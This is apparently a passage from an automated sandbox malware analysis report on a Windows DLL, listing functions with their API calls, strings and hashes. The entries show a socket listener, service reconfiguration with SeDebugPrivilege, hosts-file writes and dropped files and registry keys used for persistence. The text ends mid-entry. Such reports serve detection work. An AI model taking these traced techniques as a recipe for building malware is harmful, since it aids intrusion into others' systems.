                                                          • API ID: File$lstrlen$#823CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                          • String ID: .key
                                                          • API String ID: 2856261289-343438762
                                                          • Opcode ID: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                          • Instruction ID: bd8e3325d0db8e7463eafbc11f0d66b84d6b493b70728e4679981c1757bf8fad
                                                          • Opcode Fuzzy Hash: 3818ea17cc2e59f9f6ab64f97ab2d81d5e532922a39f58c257a4f2331ab7a23d
                                                          • Instruction Fuzzy Hash: A0215C752006042BF724DA789C8AFAB3A89FB84760F580739FE57D71D1DEA49D088760
                                                          Function 100014B0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: WINMM.dll$waveOutGetNumDevs$waveOutOpen$waveOutPrepareHeader
                                                          • API String ID: 2574300362-4065288365
                                                          • Opcode ID: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                          • Instruction ID: 97c40741ceac41b55f427a3e19617a04594bb35f0b993fe0b131869bec9d13a6
                                                          • Opcode Fuzzy Hash: c1eceda1addd48c4943001bcefb37505a5823e870f1f8cdf6cdf7baea139bf02
                                                          • Instruction Fuzzy Hash: C5212676600204ABDB10DF68EC84AA67BE8FFC8310F154469EB049B301D736E945DBE0
                                                          Function 1000E5B0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60registryfilestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000E5EA
                                                          • lstrlenA.KERNEL32 ref: 1000E609
                                                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 1000E612
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000E619
                                                          • RegCreateKeyA.ADVAPI32(80000001,TGByte\Setup,?), ref: 1000E62E
                                                          • RegSetValueExA.ADVAPI32(00000000,Host,00000000,00000001,?), ref: 1000E650
                                                          • RegCloseKey.ADVAPI32(?), ref: 1000E65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFile$HandleValueWritelstrlen
                                                          • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                          • API String ID: 1763583472-3579490797
                                                          • Opcode ID: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                          • Instruction ID: 77af767004de95c6ec99707751be97fa26c4c007db1504f7e5df3f5080d650d4
                                                          • Opcode Fuzzy Hash: 3c72f0055c499f351d9c69bb76d358f610eb38518ca91f6f01103dca83156795
                                                          • Instruction Fuzzy Hash: 9E11A375100310BBE320DB68CC49FEB7BADFB89751F044A18F659A21D0DBB4A8058BA2
                                                          Function 10023D00 Relevance: 16.7, APIs: 11, Instructions: 175sleepnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 10023D9A
                                                          • _errno.MSVCRT ref: 10023DA4
                                                          • __WSAFDIsSet.WS2_32(?,?), ref: 10023DBC
                                                          • __WSAFDIsSet.WS2_32(?,?), ref: 10023DD2
                                                          • recvfrom.WS2_32(00000010,?,00001FF6,00000000,?,00000010), ref: 10023E0C
                                                          • inet_addr.WS2_32(00000000), ref: 10023E8D
                                                          • htons.WS2_32(?), ref: 10023E9C
                                                          • Sleep.KERNEL32(00000005), ref: 10023ECC
                                                          • Sleep.KERNEL32(00000005,?,?), ref: 10023F37
                                                          • closesocket.WS2_32 ref: 10023F4C
                                                          • closesocket.WS2_32(?), ref: 10023F52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleepclosesocket$_errnohtonsinet_addrrecvfromselect
                                                          • String ID:
                                                          • API String ID: 1415794423-0
                                                          • Opcode ID: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                          • Instruction ID: 526c464df8ce17cb72c57ff37cbb3dc0b2e5127f8a28d9ed385b909f9f69fec1
                                                          • Opcode Fuzzy Hash: 6df6ff11d769b684a62b0966e0b602471fdf7786851801ab43aab968e0e1c4fd
                                                          • Instruction Fuzzy Hash: F461A074508381ABD710CF24EC44AABB7F4FFC4714F408A2EF99997250E774D9098B66
                                                          Function 10023B10 Relevance: 16.7, APIs: 11, Instructions: 151stringnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • strchr.MSVCRT ref: 10023B29
                                                          • atoi.MSVCRT(?), ref: 10023B56
                                                          • strchr.MSVCRT ref: 10023B98
                                                          • strncpy.MSVCRT ref: 10023BCF
                                                          • strchr.MSVCRT ref: 10023BDB
                                                          • strncpy.MSVCRT ref: 10023C03
                                                          • strncpy.MSVCRT ref: 10023C1F
                                                          • InitializeCriticalSection.KERNEL32(1012C4E8), ref: 10023C86
                                                            • Part of subcall function 10023A10: WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                            • Part of subcall function 10023A10: socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                            • Part of subcall function 10023A10: htons.WS2_32 ref: 10023A68
                                                            • Part of subcall function 10023A10: bind.WS2_32 ref: 10023A83
                                                            • Part of subcall function 10023A10: listen.WS2_32(00000000,00000032), ref: 10023A94
                                                          • WSACleanup.WS2_32 ref: 10023C91
                                                          • DeleteCriticalSection.KERNEL32(1012C4E8), ref: 10023C9C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strchrstrncpy$CriticalSection$CleanupDeleteInitializeStartupatoibindhtonslistensocket
                                                          • String ID:
                                                          • API String ID: 2616448033-0
                                                          • Opcode ID: c1a92cea721e5ccf23c547a041e3012d1e5b2b7bb08ce381eb8394f58684be4a
                                                          • Instruction ID: f97e8e17b2a768c3703299967ac859346c69456c2f5632f748529884bcaa4716
                                                          • Opcode Fuzzy Hash: c1a92cea721e5ccf23c547a041e3012d1e5b2b7bb08ce381eb8394f58684be4a
                                                          • Instruction Fuzzy Hash: 4941C0366046081BD32C96789C558FF7BD5FBC4320F554B2EFA2B936D0DEB4DA088694
                                                          Function 100089F0 Relevance: 16.6, APIs: 11, Instructions: 136stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                          • String ID:
                                                          • API String ID: 3289936468-0
                                                          • Opcode ID: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                          • Instruction ID: c614f76b29358a3fda3e897671393add0d389b4ba00e88ce342a7451a82b3d62
                                                          • Opcode Fuzzy Hash: 0dd721cf81c20e6a7698efb1a4a3b03771bafae10b7b11cfc38245ae795d8177
                                                          • Instruction Fuzzy Hash: 8241E8B4D046559FF721CF188C447AEBBE4FB0A6E0F14066AE8D5A3645C3344A02CFA6
                                                          Function 10011330 Relevance: 16.6, APIs: 11, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #540.MFC42 ref: 10011358
                                                          • #858.MFC42(00000004), ref: 10011376
                                                          • #922.MFC42(?,00000000,00000000,?,?,?,?), ref: 100113A9
                                                          • #858.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113B8
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113C6
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113D4
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 100113E1
                                                          • #939.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011409
                                                          • #800.MFC42(00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?), ref: 10011416
                                                          • #535.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011426
                                                          • #800.MFC42(00000000,?,00000000,00000000,?,?,?,?), ref: 10011438
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$#858$#535#540#922#939
                                                          • String ID:
                                                          • API String ID: 1721966335-0
                                                          • Opcode ID: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                          • Instruction ID: 1068962097da1abb9be03f2cf21bec5754a184422a1b80b0b6d5662a040d76a2
                                                          • Opcode Fuzzy Hash: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                          • Instruction Fuzzy Hash: 7D319A79108381ABC305DB68D551F9FBBE9EF98A14F400A1DF49993282DB34E608C767
                                                          Function 10019680 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87servicesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000008), ref: 100196A1
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000002), ref: 100196D9
                                                          • LockServiceDatabase.ADVAPI32(00000000), ref: 100196E2
                                                          • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019728
                                                          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10019733
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019740
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019743
                                                          • Sleep.KERNEL32(000000C8), ref: 1001974A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseDatabaseHandleProcess$ChangeConfigCurrentLockManagerSleepTokenUnlock
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2207141857-2896544425
                                                          • Opcode ID: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                          • Instruction ID: dc65207eb95ef46fdda0787c0b6e18c9b4e2414683cc893defa47448b081054d
                                                          • Opcode Fuzzy Hash: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                          • Instruction Fuzzy Hash: D2213D3925411467E320AB789C4AFEB3B98FB94760F140326FA199B2C1DD74EC448675
                                                          Function 1001AA20 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAA6
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAE3
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAF3
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB03
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB0A
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                          • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                          • API String ID: 1069036285-946259135
                                                          • Opcode ID: df90664eb78daaf17b084ec3dd52f149eb00f509864bfbe91833f7a04b4eb480
                                                          • Instruction ID: 0aff0654b9bdd9743d2db3a9601396fee1076ca62053bb4e33c3f03652fb2de6
                                                          • Opcode Fuzzy Hash: df90664eb78daaf17b084ec3dd52f149eb00f509864bfbe91833f7a04b4eb480
                                                          • Instruction Fuzzy Hash: 2C210731204750AFE310CB68CC91BEBB7E9FB89350F444A2CF649972D0DA755A05CBA1
                                                          Function 10019850 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78servicesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10019871
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000034), ref: 100198A9
                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100198B7
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 100198DA
                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 100198ED
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FA
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FD
                                                          • Sleep.KERNEL32(000000C8), ref: 10019904
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQuerySleepStartStatusToken
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 3878120848-2896544425
                                                          • Opcode ID: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                          • Instruction ID: 50e31cc6d71f3cb09cdeb76e9080be0a7887b9f28361484d1c1b8db58f74100a
                                                          • Opcode Fuzzy Hash: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                          • Instruction Fuzzy Hash: C721EB352502146BE714EB609C8AFBF77D4FB88350F15061AFA0A9A1C0EEB4AD448665
                                                          Function 10029670 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 100296A0
                                                          • GetCurrentProcess.KERNEL32(?), ref: 100296AB
                                                          • IsWow64Process.KERNEL32(00000000), ref: 100296B2
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100296FD
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 10029717
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 1002973C
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029745
                                                          Strings
                                                          • \sysnative\drivers\etc\hosts, xrefs: 100296C2
                                                          • \system32\drivers\etc\hosts, xrefs: 100296C9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Process$AttributesCloseCreateCurrentDirectoryHandleWindowsWow64Write
                                                          • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                          • API String ID: 4291671391-1011561390
                                                          • Opcode ID: db3a35173908d9654b0b6390464422d008ffc226902989ae664d1e8bcc7fc4df
                                                          • Instruction ID: 876cb9e05e234248209060b7e9a497e303e77612ab2a4bb1b8b68881567da2e9
                                                          • Opcode Fuzzy Hash: db3a35173908d9654b0b6390464422d008ffc226902989ae664d1e8bcc7fc4df
                                                          • Instruction Fuzzy Hash: C321C5352043056BE324DB78DC49F9B7B98FB84720F140F2CFA9A972D0DAB09D0987A1
                                                          Function 10008080 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                          • #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                          • #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                          • #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                          • #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                          • #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                          • #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                          • #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                          Strings
                                                          Memory Dump Source
